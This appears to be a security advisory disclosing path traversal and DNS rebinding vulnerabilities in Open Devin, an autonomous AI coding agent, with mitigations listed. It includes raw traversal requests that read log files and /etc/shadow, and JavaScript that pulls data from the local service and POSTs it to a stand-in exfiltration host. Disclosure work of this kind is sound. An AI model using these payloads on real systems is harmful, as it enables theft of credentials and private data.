Multiple Vulnerabilities in Open Devin (Autonomous AI Software Engineer)

Summary

Open Devin is a fully autonomous AI agent that can build entire software stacks starting from a single user prompt. It is inspired by Devin, an AI software engineering tool. The project aims to facilitate software engineering tasks through advanced AI capabilities, leveraging a combination of tools like terminal, code editor, and web browser. The project has garnered significant attention, with over 23,000 stars and 2,500 forks, indicating a strong community interest and participation in its development.

Impact

I have identified path traversal and DNS rebinding vulnerabilities in the Open Devin application that could lead to the exfiltration of sensitive data from your system.

The Opendevin community fixed these vulnerabilities very quickly.

Path Traversal Vulnerability

Path Traversal is a vulnerability that occurs when a web application does not properly sanitize user-controlled input, allowing unauthorized access or manipulation of the file system. This vulnerability allows malicious users to access or disclose sensitive information from parts of the system that should not be accessed.

For example, an attacker can send a request like /api/select-file?file=..%2f..%2fapp%2flogs%2fopendevin_2024-04-17.log to access the application's log files, which were found to contain sensitive data. The names of log files can be predicted.

Request :

GET /api/select-file?file=..%2f..%2fapp%2flogs%2fopendevin_2024-04-17.log HTTP/1.1
Host: 0.0.0.0:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://0.0.0.0:3000/index.html
Connection: close

Response : 

HTTP/1.1 200 OK
date: Wed, 17 Apr 2024 12:14:50 GMT
server: uvicorn
content-length: 82465
content-type: application/json
connection: close

{"code":"[...]"}

Request :

GET /api/select-file?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow HTTP/1.1
Host: 0.0.0.0:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://0.0.0.0:3000/index.html
Connection: close

Response : 

HTTP/1.1 200 OK
date: Wed, 17 Apr 2024 20:44:08 GMT
server: uvicorn
content-length: 614
content-type: application/json
connection: close

{"code":"root:*:19821:0:99999:7:::\ndaemon:*:19821:0:99999:7:::\nbin:*:19821:0:99999:7:::\nsys:*:19821:0:99999:7:::\nsync:*:19821:0:99999:7:::\ngames:*:19821:0:99999:7:::\nman:*:19821:0:99999:7:::\nlp:*:19821:0:99999:7:::\nmail:*:19821:0:99999:7:::\nnews:*:19821:0:99999:7:::\nuucp:*:19821:0:99999:7:::\nproxy:*:19821:0:99999:7:::\nwww-data:*:19821:0:99999:7:::\nbackup:*:19821:0:99999:7:::\nlist:*:19821:0:99999:7:::\nirc:*:19821:0:99999:7:::\n_apt:*:19821:0:99999:7:::\nnobody:*:19821:0:99999:7:::\nsystemd-network:!*:19829::::::\nsystemd-timesync:!*:19829::::::\nmessagebus:!:19829::::::\nsshd:!:19829::::::\n"}

Dns Rebinding Vulnerability

DNS rebinding is a technique where attackers trick a browser into associating a domain with a new IP address. This allows them to bypass the Same Origin Policy (SOP) and interact with a service on a different origin.

The attack involves a controlled domain and DNS server. Initially, the DNS server provides the real IP with a short Time-to-Live (TTL) to avoid caching.

Once the TTL expires, any new requests (e.g. via JavaScript) are redirected to an internal IP (such as 127.0.0.1), tricking the browser into sending requests to the intended target service while believing it is still communicating with the original site.

Steps :


- The attack involves a user visiting a website controlled by the attacker.
- By manipulating the DNS server, the attacker is able to switch between their own address and a local address, taking advantage of the low TTL.
- To this, we set our DNS server to return Multiple A records. 
;; ANSWER SECTION:
rebind.attacker.com.  0 IN  A x.x.x.x(attacker's server)
rebind.attacker.com.  0 IN  A 0.0.0.0

When the DNS server response contains more than one A record, Browser will first resolve the address x.x.x.x (attacker's server) and try to connect. If x.x.x.x cannot be reached (connection denied/no route to host), it will use another IP address, 0.0.0.0, as a fallback.

I used following malicious pseudo JavaScript:

async function run() {
  while (true) {
    fetch('http://rebind.attacker.com:3000/api/refresh-files')
    .then(resp => resp.text())
    .then(text => {
      console.log(`Retrieved logs: ${text}`)

      fetch('http://exfilhost', {
          method: 'POST',
          headers: {
              'Content-Type': 'application/json'
          },
          body: JSON.stringify({ ex: btoa(text) })
      })
      .then(response => response.text())
      .then(data => console.log(data))
      .catch(error => console.error('Error:', error));

    })
    .catch(err => {})

    await new Promise(r => setTimeout(r, 1000))
  }
}

run()

This JavaScript code continuously pulls data from http://rebind.attacker.com:3000/api/refresh-files using a while (true) loop, encodes sensitive data into Base64 format, and POSTs it as JSON to http://exfilhost/.

Mitigations :

To protect against these vulnerabilities,

- Use Authentication
- Enforce Host Header Value
- Use TLS
- Make URI Paths Unpredictable

Reference(s)

Github- Open Devin

Timeline

2024-04-24 - v1.0